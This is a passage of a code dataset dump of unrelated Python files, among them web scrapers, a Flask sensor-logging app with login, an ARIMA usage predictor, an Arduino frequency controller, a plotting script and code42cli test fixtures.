xrange(len(tree[currLine])):\n if currInLine[currLine][i] == 1:\n currLoc = i\n reclosefunc()\n break\n \n else:\n currLoc = currLoc + 1\n\n for i in xrange(len(tree)):\n for j in xrange(len(tree[i])):\n curpos.append(0)\n termconditions.append(2)\n currInLine.append(curpos)\n termCond.append(termconditions)\n curpos = []\n termconditions = []\n\n currLine = 0\n currLoc = currInLine[currLine][0]\n \n while (currInLine != termCond):\n currInLine[currLine][currLoc] = 1\n plan.append(tree[currLine][currLoc])\n\n if tree[currLine][currLoc][1] == 1.0 or tree[currLine][currLoc][1] == 0.0:\n reclosefunc() \n else:\n currLine = currLine + 1\n for i in xrange(len(tree[currLine])):\n if currInLine[currLine][i] == 0:\n currLoc = i\n break\n\n plotRooms = []\n plotElements = [(0,0,plotSizeX,plotSizeY)]\n roomDesc = []\n\n for i in xrange(0,len(plan)):\n if plan[i][1] != 1.0 and plan[i][1] != 0.0:\n tree = tree_node(plan[i][0],plan[i][1],tree_node(1,1,None,None),tree_node(1,1,None,None))\n plotDivision = traverse(tree,plotElements[0][0],plotElements[0][1],plotElements[0][2]-plotElements[0][0],plotElements[0][3]-plotElements[0][1])\n plotElements.insert(1,plotDivision[0])\n plotElements.insert(2,plotDivision[1])\n del plotElements[0]\n else:\n if plan[i][1] == 1.0:\n roomDesc.append('R')\n else:\n roomDesc.append('S')\n plotRooms.append(plotElements[0])\n del plotElements[0]\n\n for k in xrange(0, len(roomDesc)):\n plotRooms.insert(2*k,roomDesc[k])\n\n return plotRooms\n\n \n\n\n \n","sub_path":"app/floorplanner/parseTree.py","file_name":"parseTree.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"525801107","text":"# -*- coding:utf8 -*-\n\nimport random,string\n\n\na=(string.ascii_letters+string.digits)\n\n\nprint(''.join(random.sample(string.ascii_uppercase+string.digits,4)))\n\n\nconent=''\nfor i in range(4):\n\tif i != random.randrange(4):\n\t\ttemp=chr(random.randrange(75,90))\n\telse:\n\t\ttemp=str(random.randrange(0,9))\n\tconent+=temp\nprint(conent)\n\n\n\n\n\n","sub_path":"daemon/build_in_module/random/random_2.py","file_name":"random_2.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"210233200","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib.pylab import rcParams\nfrom pandas import datetime\nfrom pandas import DataFrame\nfrom matplotlib import pyplot\nimport time\nimport itertools\nfrom datetime import datetime, date, time, timedelta\nimport statsmodels.api as sm\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport sys\n\ndef predict(ts_day_log):\n import statsmodels.api as sm\n from statsmodels.tsa.arima_model import ARIMA\n from sklearn.metrics import mean_squared_error\n X = ts_day_log.values\n predictions = list()\n model = ARIMA(X, order=(10, 0, 1))\n model_fit = model.fit(transparams=True,trend='c',disp=False)\n predictions = model_fit.forecast(30)[0]\n return np.exp(predictions)\n\ndef Bill_expected(userID): \n BlockT = [94,252,281,352,484,661,716,739,781,865]\n BlockC = [1103,1180,1192,1283,1314,1464,1507,1589,1697,1714,1718,2034]\n BlockG = [2064,2094,2129,2449,2461,2925,2945,3110,3147,3310]\n BlockA = [3367,3413,3482,3723,3773,3893,4031,4213,4297,4732,6910]\n \n ####### Determine Block ########\n ref = ''\n if int(userID) in BlockA:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockA.csv'\n elif int(userID) in BlockC:\n 
ref = '/home/aya/Desktop/Aquapedia/Datasets/blockC.csv'\n elif int(userID) in BlockG:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockG.csv'\n elif int(userID) in BlockT:\n ref = '/home/aya/Desktop/Aquapedia/Datasets/blockT.csv'\n else:\n return None\n ###### read data & prepare data #######\n try:\n dateparse = lambda dates: pd.datetime.strptime(dates, '%Y-%m-%d %H:%M:%S')\n data = pd.read_csv(ref , parse_dates= ['localminute'], index_col='localminute',date_parser=dateparse)\n except:\n return None\n group = data.groupby('dataid')\n user = group.get_group(int(userID))['meter_value']\n user_data = user.resample('D').sum()\n userdata = user_data.interpolate(method='linear')\n userdata.dropna(inplace=True)\n userdata = userdata[userdata>0]\n ############ get log of data ########\n try:\n data_log = np.log(userdata)\n ts_log = data_log.replace([np.inf, -np.inf], np.nan)\n ts_day_log = ts_log.interpolate(method='linear')\n #### expected usage ######\n predictions = predict(ts_day_log)\n except:\n predictions = []\n #### current month #######\n user_bill = user.resample('M').sum()\n user_bill = user_bill[user_bill>0]\n try:\n current_user_bill= user_bill[str(user_bill.tail(1).index[0])[:7]]\n except:\n current_user_bill = 0 \n i=1\n with open(\"/home/aya/Desktop/Aquapedia/Datasets/predictions/predictions.csv\", \"a\") as myfile:\n for item in predictions:\n if len(str(i))==1:\n myfile.write(str(userdata.tail(1).index[0])[:7]+'-0'+str(i))\n else:\n myfile.write(str(userdata.tail(1).index[0])[:7]+'-'+str(i))\n myfile.write(',%d,%d' % (int(userID),current_user_bill))\n myfile.write(\",%d \" % item)\n i+=1\n myfile.write('\\n')\neval(sys.argv[1])","sub_path":"python_scripts/customer_dashboard/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"311746767","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef getArticleFromPage(pagenumber):\r\n urlPage = 'https://www.newyorker.com/humor/borowitz-report/page/' + str(pagenumber)\r\n response = requests.get(urlPage)\r\n soupSite = BeautifulSoup(response.text, 'html.parser')\r\n soupArticle = soupSite.find_all(\"div\", class_=\"River__riverItemContent___2hXMG\")\r\n return soupArticle\r\n\r\ndef getHeadlineDataFormArticle(soupArticle):\r\n result = []\r\n for x in soupArticle:\r\n headline = x.find(\"h4\" ,class_= \"River__hed___re6RP\").get_text()\r\n article_link = x.find(\"a\")['href']\r\n is_sarcastic = '1'\r\n result.append([headline, article_link, is_sarcastic])\r\n return result\r\n\r\ndef writeFile(headlineData):\r\n fileOutput = open(\"NewYorker.txt\", \"a\", encoding=\"utf-8\")\r\n for i in headlineData:\r\n strOut = i[0] + \"|https://www.newyorker.com\" + i[1] + \"|\" + i[2] + \"\\n\"\r\n fileOutput.writelines(strOut)\r\n fileOutput.close()\r\n \r\ndef getDataFromPage(pagenumber):\r\n soupArticle = getArticleFromPage(pagenumber)\r\n headlineData = getHeadlineDataFormArticle(soupArticle)\r\n writeFile(headlineData)\r\n print(\"Number of data: \",len(headlineData))\r\n print(\"\\n\")\r\n \r\ndef main():\r\n pagenumber = 143 \r\n while pagenumber:\r\n getDataFromPage(pagenumber)\r\n pagenumber -= 1\r\nmain()\r\n","sub_path":"Colab/CSV/Sarcasm_Detection/Crawler/newyorker.com.py","file_name":"newyorker.com.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"325888483","text":"# Created by Gurudev Dutt on 
1/3/20\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n_ARD_COM_PORT = 'COM13'\n_LOWFREQ_LIMIT = 1000000\n_HIGHFREQ_LIMIT = 3200000000\nimport visa\nimport sys\n\n\nclass PTS(object):\n '''\n This is the main module imported to other programs if not using control panel GUI.\n We assume that the sketch running on the arduino connected to PTS is PTS.ino which\n is in the same folder as this python code. It contains 7 main methods: \n 1, __init__: finds Arduino, gets visa, and gets ready to communicate, \n 2, read: read current command freq from Arduino\n 3, write: write command freq to Arduino\n 4, set: set amplitude input voltage.\n 5, reset: reset amplitude input to default. (default amplitude adjustable on PTS rear panel)\n 6, scan: scan frequency from start to stop, with number of steps, and dwell time specified by the caller\n 7, cleanup: cleanup\n If not using GUI control panel, just import this class.\n '''\n\n def __init__(self, PTSport = _ARD_COM_PORT):\n self.rm = visa.ResourceManager()\n self.arduino = self.rm.open_resource(PTSport)\n try:\n self.arduino.read()\n except visa.VisaIOError:\n sys.stderr.write('Error communicating with PTS')\n\n def read(self):\n try:\n s = self.arduino.query('b').replace('\\r\\n', '')\n except visa.VisaIOError as error:\n sys.stderr.write('VISA IO Error: {0}'.format(error))\n return None\n return self.decode(s)\n\n def write(self, freq):\n if (int(freq) < _LOWFREQ_LIMIT or int(freq) > _HIGHFREQ_LIMIT):\n sys.stderr.write('Invalid frequency given')\n return False\n try:\n self.arduino.query('f' + str(freq) +'#')\n return True\n except visa.VisaIOError as error:\n sys.stderr.write('VISA IO Error: {0}'.format(error))\n return False\n except:\n sys.stderr.write(\"Unexpected error: {0}\".format(sys.exc_info()[0]))\n return False\n\n def decode(self, s):\n '''\n This function decodes BCD string into frequency integer.\n Every 4 bits are decoded to 1 decimal digit.\n @param s: str that consists of '0' and '1' only\n @return: int decoded frequency\n '''\n try:\n while s[0] == '0':\n s = s[1:]\n except IndexError:\n return 0 # This happens when s is nothing but a series of '0'\n if len(s) % 4 != 0:\n s = '0' * (4 - len(s) % 4) + s\n ss = []\n while s != '':\n ss.append(s[:4])\n s = s[4:]\n freq = 0\n for each_4_bits in ss:\n freq *= 10\n freq += int(each_4_bits, 2)\n return freq\n\n def encode(self, freq):\n '''\n This function encodes integer frequency into BCD string.\n Each digit is encoded to 4 bits.\n @param freq: int frequency\n @return: str that consists of '0' and '1' only,length of 38\n '''\n dec_str = str(freq)\n bcd_str = ''\n for each_digit in dec_str:\n s = bin(int(each_digit))[2:]\n if len(s) < 4:\n s = '0' * (4 - len(s)) + s\n bcd_str += s\n l = len(bcd_str)\n if l < 38:\n bcd_str = '0' * (38 - l) + bcd_str\n elif l > 38:\n bcd_str = bcd_str[(l - 38):]\n print(bcd_str)\n return bcd_str\n\n def 
set(self,amp):\n pass\n\n def reset(self,amp):\n pass\n\n def scan(self, start, stop, numsteps, dwelltime):\n pass\n\n def cleanup(self):\n self.arduino.write('f0#')\n self.arduino.close()","sub_path":"source/Hardware/PTS3200/PTS.py","file_name":"PTS.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"481690400","text":"# Copyright (c) 2019 Microsoft Corporation\n# Distributed under the MIT software license\n\nimport logging\nimport sys\n\nfrom interpret.ext.extension_utils import load_class_extensions\n\nmodule_logger = logging.getLogger(__name__)\n\nBLACKBOX_EXTENSION_KEY = \"interpret_ext_blackbox\"\n\n\ndef _is_valid_blackbox_explainer(proposed_blackbox_explainer):\n for explanation_type in [\"local\", \"global\", \"perf\", \"data\"]:\n if hasattr(proposed_blackbox_explainer, \"explain_\" + explanation_type):\n return True\n return False\n\n\n# How to get the current module\n# https://stackoverflow.com/questions/1676835\ncurrent_module = sys.modules[__name__]\n\nload_class_extensions(current_module, BLACKBOX_EXTENSION_KEY, _is_valid_blackbox_explainer)\n","sub_path":"python/interpret/ext/blackbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"256653699","text":"#!/c/Users/User/Anaconda2/python\n\nfrom lxml import html\nfrom lxml.etree import XPath\nimport requests\nimport contestant\n\nclass Season:\n \"\"\"\n Represents a season of the Bachelorette television show\n \"\"\"\n\n def __init__(self, number, url):\n self.number = number\n self.url = url\n self.contestants = [] \n self.rows_xpath = XPath('//*[@id=\"mw-content-text\"]/table[2]/tr')\n self.name_xpath = XPath('td/text()')\n\n def get(self):\n page = requests.get(self.url)\n page_content = html.fromstring(page.content)\n \n for row in self.rows_xpath(page_content): \n if(len(self.name_xpath(row)) > 0):\n row_text = self.name_xpath(row)\n c = contestant.Contestant(row_text[0], row_text[1], row_text[2], row_text[3])\n self.contestants.append(c)\n","sub_path":"scrapper/season.py","file_name":"season.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"367288227","text":"\"\"\"\nNCL_bar_7.py\n===============\nConcepts illustrated:\n - Drawing filled bars\n - Filling the bars in a bar plot with different colors\n - Setting the minimum/maximum value of the Y axis in a bar plot\n - Adding text to a plot\n - Rotating text 45 degrees\n - Drawing a custom legend\n\nThis Python script reproduces the NCL plot script found here: https://www.ncl.ucar.edu/Applications/Scripts/bar_7.ncl\n\nThe NCL graphics and description for this script are found here: https://www.ncl.ucar.edu/Applications/bar.shtml#ex7\n\"\"\"\n\n###############################################################################\n# Import the necessary python libraries\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n\n\n###############################################################################\n# Create the plot data\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ndata = [154900, 56600, 40000, 30200, 29700, 24400, 21700, 13900]\nlabels = ['Lung', 'Colon/rectum', 'Breast', 'Prostate', 'Pancreas', \n 'Non-Hodgkin\\'s Lymphoma', 'Leukemias', 'Ovary']\n\n###############################################################################\n# 
Create the custom color list.\ncolor_list = ['firebrick', 'red', 'orange', 'green', 'navy', 'blue', 'skyblue', 'slateblue']\n\n###############################################################################\n# Specify some plot settings.\n\n# Title settings\ntitle = 'Estimated Cancer Deaths for 2002'\ntitle_fontsize = 16\n\n# Axis Settings\nplot_y_max = 180_000\n\n# Tick Settings\nmajor_tick_spacing = 30_000\nminor_tick_spacing = 10_000\ntick_label_fontsize = 12\ntick_length_multiplier = 2\n\n# Label Settings\nlabel_rotation = 45\nlabel_y_offset = 2000\n\n###############################################################################\n# Create the first bar chart.\n\n# Figure size is (width, height) inches.\nplt.figure(1, figsize=(6, 5))\n\nplt.bar(x, data, color=color_list, edgecolor='black')\nplt.title(title, fontsize=title_fontsize)\n\n# Add a rotated label to each bar.\nfor k, label in enumerate(labels):\n plt.text(x[k], data[k]+label_y_offset, label, rotation=label_rotation)\n\n\n# Draw ticks on three sides of the plot. Suppress tick labels on the bottom.\nplt.tick_params(which='both', top=True, right=True, left=True, bottom=False, labelsize=tick_label_fontsize)\nplt.xticks([], [])\n\n# Set the tick spacing and limits for the Y axis.\nax = plt.gca()\nax.yaxis.set_major_locator(MultipleLocator(major_tick_spacing))\nax.yaxis.set_minor_locator(MultipleLocator(minor_tick_spacing))\n\n# Increase the tick mark lengths by some factor.\ny_major_tick_length = plt.rcParams[\"ytick.major.size\"]\ny_minor_tick_length = plt.rcParams[\"ytick.minor.size\"]\nplt.tick_params(which='major', length=y_major_tick_length * tick_length_multiplier)\nplt.tick_params(which='minor', length=y_minor_tick_length * tick_length_multiplier)\n\n# Set the limits for the Y axis.\nplt.ylim(top=plot_y_max)\n\n# Draw plot on the screen.\nplt.show()\n\n\n###############################################################################\n# Create the second bar chart with a legend.\n\n\n## NOTE: you may need to close the first figure window to see the second figure.\n# Figure size is (width, height) inches.\nplt.figure(2, figsize=(6, 5))\n\nbar_handle = plt.bar(x, data, color=color_list, edgecolor='black')\nplt.ylabel(\"Number of Deaths\", fontsize=16)\nplt.title(title, fontsize=title_fontsize)\n\n# Reverse the legend ordering to match NCL.\nbars_reversed = bar_handle[::-1]\nlabels_reversed = labels[::-1]\n\n# Add the legend.\nplt.legend(bars_reversed, labels_reversed)\n\n# Draw ticks on three sides of the plot. 
Suppress tick labels on the bottom.\nplt.tick_params(which='both', top=True, right=True, left=True, bottom=False, labelsize=tick_label_fontsize)\nplt.xticks([], [])\n\n# Set the tick spacing and limits for the Y axis.\nax = plt.gca()\nax.yaxis.set_major_locator(MultipleLocator(major_tick_spacing))\nax.yaxis.set_minor_locator(MultipleLocator(minor_tick_spacing))\n\n# Increase the tick mark lengths by some factor.\ny_major_tick_length = plt.rcParams[\"ytick.major.size\"]\ny_minor_tick_length = plt.rcParams[\"ytick.minor.size\"]\nplt.tick_params(which='major', length=y_major_tick_length * tick_length_multiplier)\nplt.tick_params(which='minor', length=y_minor_tick_length * tick_length_multiplier)\n\n# Set the limits for the Y axis.\nplt.ylim(top=plot_y_max)\n\n# Move the figure left border, so Y Label appears without manually adjusting the viewport.\nplt.subplots_adjust(left=0.2)\n\n# Draw plot on the screen.\nplt.show()\n","sub_path":"Plots/Bar/NCL_bar_7.py","file_name":"NCL_bar_7.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582371780","text":"import sys\r\nprefix = 'data/clean_inputs/'\r\nedge_prefix = 'data/edge_inputs/'\r\nedges = {}\r\nprint(' ]', end='\\r[')\r\nfor i in range(24):\r\n print('#', sep=' ', end='')\r\n sys.stdout.flush()\r\n filename = 'clear_output_' + str(i) + '.csv'\r\n with open(prefix + filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n coord = line.split(';')\r\n for j in range(1, int(len(coord)/2) - 1):\r\n key = coord[2*j-1] + ';' + coord[2*j] + ';' + coord[2*j+1] + ';' + coord[2*j+2]\r\n if (key in edges):\r\n edges[key] += 1\r\n else:\r\n edges[key] = 1\r\n with open(edge_prefix + 'edges_' + str(i) + '.csv', 'a') as f:\r\n for _id, key in zip(range(len(edges)), edges):\r\n f.write(str(_id) + ';' + key + ';' + str(edges[key]) + '\\n')\r\n for x in edges:\r\n edges[x] = 0;\r\n","sub_path":"edgefy.py","file_name":"edgefy.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101757498","text":"import torch\n\nclass CommonUtils():\n def init_bias2zero(self, model):\n for name, params in model.named_parameters():\n if 'bias' in name:\n torch.nn.init.zeros_(params)\n \n \nclass EarlyStopping():\n def __init__(self, patience=0):\n self.step = 0\n self.loss = torch.tensor(float('inf'))\n self.patience = patience\n \n def validation(self, loss):\n if self.loss < loss:\n self.step += 1\n if self.step > self.patience:\n print('Early stopping!')\n return True\n \n else:\n self.step = 0\n self.loss = loss\n \n return False","sub_path":"utils/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"327833325","text":"from django.urls import path, include\r\nfrom . 
import views\r\nfrom rest_framework import routers\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register('shops', views.ShopView)\r\n\r\nurlpatterns = [\r\n path('', include(router.urls)),\r\n path('prefered/', views.LikedShops.as_view()),\r\n path(r'like/<int:pk>/', views.LikeShop.as_view())\r\n]\r\n","sub_path":"wcc/api/shops/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"561920601","text":"# import python modules\nimport os\nimport pytz\nimport datetime\n\n# import the Flask class from flask module\nfrom flask import Flask, render_template, redirect, \\\n\t\turl_for,request,session,flash, jsonify\nfrom functools import wraps\nfrom flask_socketio import SocketIO\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = SQLAlchemy(app)\nsocketio = SocketIO(app)\n\nfrom models import *\n\n# login required decorator\ndef login_required(f):\n\t@wraps(f)\n\tdef wrap(*args, **kwargs):\n\t\tif 'logged_in' in session:\n\t\t\treturn f(*args, **kwargs)\n\t\telse:\n\t\t\t# flash('You need to login first.')\n\t\t\treturn redirect(url_for('login'))\n\t\t\t# return render_template('login.html', error=error)\n\treturn wrap\n\n# Restful\n@app.route('/sensor/api/v1.0/temperature/<temp_value>', methods=['GET'])\ndef get_temp(temp_value):\n\tsen_val = temp_value.split('&')\n\ttz = pytz.timezone('Asia/Bangkok')\n\tnow = datetime.datetime.now(tz)\n\n\t# if sen_val[1] == \"temp\":\n\t# \tsocketio.emit('response', {'datetime': now.strftime('%a %b %d %Y %H:%M'),'data': \"%.2f\"%float(sen_val[0])}, \n\t# \t\tbroadcast=True)\n\t#insert into db\n\t# new_measure = Measure(\n\t# \t\tdate = now.strftime('%Y-%m-%d %H:%M:%S'),\n\t# \t\tvalue = float(sen_val[0]),\n\t# \t\tcategory = sen_val[1],\n\t# )\n\t# db.session.add(new_measure)\n\t# db.session.commit()\n\treturn jsonify({'result':'success'})\n\n@app.route('/sensor/api/v1.1/measures/<recieve_values>',methods=['GET'])\ndef get_value(recieve_values):\n\tvalues = recieve_values.split(',')\n\tif len(values) == 6:\n\t\ttz = pytz.timezone('Asia/Bangkok')\n\t\tnow = datetime.datetime.now(tz)\n\t\tnew_measure = Measure(\n\t\t\t\tdate = now.strftime('%Y-%m-%d %H:%M:%S'),\n\t\t\t\tvalue1 = values[0],\n\t\t\t\tvalue2 = values[1],\n\t\t\t\tvalue3 = values[2],\n\t\t\t\tvalue4 = values[3],\n\t\t\t\tdigitalIn = values[4],\n\t\t\t\tdigitalOut = values[5]\n\t\t)\n\t\tdb.session.add(new_measure)\n\t\tdb.session.commit()\n\t\treturn jsonify({'result':'success'})\n\telse:\n\t\treturn jsonify({'result':'error'})\n\n\n@app.route('/')\ndef welcome():\n\treturn render_template('login.html')\n\n@app.route('/locate',methods=['GET','POST'])\n@login_required\ndef locate():\n\treturn render_template('location.html')\n\n@app.route('/index',methods=['GET','POST'])\n@login_required\ndef home():\n\t# t = Measure.query.filter_by(category=\"temp\").order_by(Measure.date.asc()).limit(20)\n\t# test = []\n\t# query = ViewMeasure.query.all()\n\t# for i in query:\n\t# \ttest.append({\"id\":i.id,\"date\":i.date.strftime(\"%a %b %d %Y %H:%M\"),\"value\":\"%.2f\"%i.value,\"category\":i.category})\n\treturn render_template('demo.html',measures=get_measures())\n\n@app.route('/_get_measures')\ndef get_measures():\n\tmeasures = []\n\tquery = ViewMeasure.query.all()\n\tfor i in query:\t\t\n\t\tmeasures.append({\"date\":i.date.strftime(\"%a %b %d %Y %H:%M\"),\"value1\":i.value1,\"value2\":i.value2})\n\treturn measures\n\n# route for handling the 
login page logic\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\terror = None\n\tif request.method == 'POST':\n\t\tuser = User.query.filter_by(name=request.form['username']).first()\n\t\tif user is not None and user.password == request.form['password']:\n\t\t\tsession['logged_in'] = True\n\t\t\treturn redirect(url_for('locate'))\n\t\telse:\n\t\t\terror = 'Invalid Credentials. Please try again.'\n\treturn render_template('login.html', error=error)\n\n@app.route('/logout')\n@login_required\ndef logout():\n\tsession.pop('logged_in',None)\n\treturn redirect(url_for('login'))\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n\terror = None\n\tif request.method == 'POST':\n\t\tuser = User.query.filter_by(name=request.form['username']).first()\n\t\tif user is None:\t\t\t\n\t\t\tnew_user = User(\n\t\t\t\t\tname = request.form['username'],\n\t\t\t\t\temail = request.form['email'],\n\t\t\t\t\tpassword = request.form['password']\n\t\t\t)\n\t\t\tdb.session.add(new_user)\n\t\t\tdb.session.commit()\n\t\t\tflash('Registration successful. Please try to log in.')\n\t\t\treturn redirect(url_for('login'))\n\t\telse:\n\t\t\terror = 'Username is invalid. Please try again.'\n\treturn render_template('register.html', error=error)\n\n# start the server with the 'run()' method\nif __name__ == '__main__':\n\tsocketio.run(app)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"360733330","text":"import json\nimport logging\n\nimport py42.sdk.queries.alerts.filters as f\nimport pytest\nfrom c42eventextractor.extractors import AlertExtractor\nfrom py42.exceptions import Py42NotFoundError\nfrom py42.sdk.queries.alerts.filters import AlertState\nfrom tests.cmds.conftest import filter_term_is_in_call_args\nfrom tests.cmds.conftest import get_filter_value_from_json\nfrom tests.cmds.conftest import get_mark_for_search_and_send_to\nfrom tests.conftest import create_mock_response\nfrom tests.conftest import get_test_date_str\n\nfrom code42cli import errors\nfrom code42cli import PRODUCT_NAME\nfrom code42cli.cmds.search import extraction\nfrom code42cli.cmds.search.cursor_store import AlertCursorStore\nfrom code42cli.logger.enums import ServerProtocol\nfrom code42cli.main import cli\n\n\nBEGIN_TIMESTAMP = 1577858400.0\nEND_TIMESTAMP = 1580450400.0\nCURSOR_TIMESTAMP = 1579500000.0\nALERT_SUMMARY_LIST = [{\"id\": i} for i in range(20)]\nALERT_DETAIL_RESULT = [\n {\n \"alerts\": [\n {\"id\": 1, \"createdAt\": \"2020-01-17\"},\n {\"id\": 11, \"createdAt\": \"2020-01-18\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 2, \"createdAt\": \"2020-01-19\"},\n {\"id\": 12, \"createdAt\": \"2020-01-20\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 3, \"createdAt\": \"2020-01-01\"},\n {\"id\": 13, \"createdAt\": \"2020-01-02\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 4, \"createdAt\": \"2020-01-03\"},\n {\"id\": 14, \"createdAt\": \"2020-01-04\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 5, \"createdAt\": \"2020-01-05\"},\n {\"id\": 15, \"createdAt\": \"2020-01-06\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 6, \"createdAt\": \"2020-01-07\"},\n {\"id\": 16, \"createdAt\": \"2020-01-08\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 7, \"createdAt\": \"2020-01-09\"},\n {\"id\": 17, \"createdAt\": \"2020-01-10\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 8, \"createdAt\": \"2020-01-11\"},\n {\"id\": 18, \"createdAt\": \"2020-01-12\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 9, \"createdAt\": 
\"2020-01-13\"},\n {\"id\": 19, \"createdAt\": \"2020-01-14\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 10, \"createdAt\": \"2020-01-15\"},\n {\"id\": 20, \"createdAt\": \"2020-01-16\"},\n ]\n },\n]\nSORTED_ALERT_DETAILS = [\n {\"id\": 12, \"createdAt\": \"2020-01-20\"},\n {\"id\": 2, \"createdAt\": \"2020-01-19\"},\n {\"id\": 11, \"createdAt\": \"2020-01-18\"},\n {\"id\": 1, \"createdAt\": \"2020-01-17\"},\n {\"id\": 20, \"createdAt\": \"2020-01-16\"},\n {\"id\": 10, \"createdAt\": \"2020-01-15\"},\n {\"id\": 19, \"createdAt\": \"2020-01-14\"},\n {\"id\": 9, \"createdAt\": \"2020-01-13\"},\n {\"id\": 18, \"createdAt\": \"2020-01-12\"},\n {\"id\": 8, \"createdAt\": \"2020-01-11\"},\n {\"id\": 17, \"createdAt\": \"2020-01-10\"},\n {\"id\": 7, \"createdAt\": \"2020-01-09\"},\n {\"id\": 16, \"createdAt\": \"2020-01-08\"},\n {\"id\": 6, \"createdAt\": \"2020-01-07\"},\n {\"id\": 15, \"createdAt\": \"2020-01-06\"},\n {\"id\": 5, \"createdAt\": \"2020-01-05\"},\n {\"id\": 14, \"createdAt\": \"2020-01-04\"},\n {\"id\": 4, \"createdAt\": \"2020-01-03\"},\n {\"id\": 13, \"createdAt\": \"2020-01-02\"},\n {\"id\": 3, \"createdAt\": \"2020-01-01\"},\n]\nADVANCED_QUERY_VALUES = {\n \"state_1\": \"OPEN\",\n \"state_2\": \"PENDING\",\n \"state_3\": \"IN_PROGRESS\",\n \"actor\": \"test@example.com\",\n \"on_or_after\": \"2020-01-01T06:00:00.000000Z\",\n \"on_or_after_timestamp\": 1577858400.0,\n \"on_or_before\": \"2020-02-01T06:00:00.000000Z\",\n \"on_or_before_timestamp\": 1580536800.0,\n \"rule_id\": \"xyz123\",\n}\nADVANCED_QUERY_JSON = \"\"\"\n{{\n \"srtDirection\": \"DESC\",\n \"pgNum\": 0,\n \"pgSize\": 100,\n \"srtKey\": \"CreatedAt\",\n \"groups\": [\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{state_1}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }},\n {{\n \"value\": \"{state_2}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }},\n {{\n \"value\": \"{state_3}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{actor}\",\n \"term\": \"actor\",\n \"operator\": \"CONTAINS\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"AND\",\n \"filters\": [\n {{\n \"value\": \"{on_or_after}\",\n \"term\": \"createdAt\",\n \"operator\": \"ON_OR_AFTER\"\n }},\n {{\n \"value\": \"{on_or_before}\",\n \"term\": \"createdAt\",\n \"operator\": \"ON_OR_BEFORE\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{rule_id}\",\n \"term\": \"ruleId\",\n \"operator\": \"IS\"\n }}\n ]\n }}\n ],\n \"groupClause\": \"AND\"\n}}\"\"\".format(\n **ADVANCED_QUERY_VALUES\n)\nadvanced_query_incompat_test_params = pytest.mark.parametrize(\n \"arg\",\n [\n (\"--begin\", \"1d\"),\n (\"--end\", \"1d\"),\n (\"--severity\", \"HIGH\"),\n (\"--actor\", \"test\"),\n (\"--actor-contains\", \"test\"),\n (\"--exclude-actor\", \"test\"),\n (\"--exclude-actor-contains\", 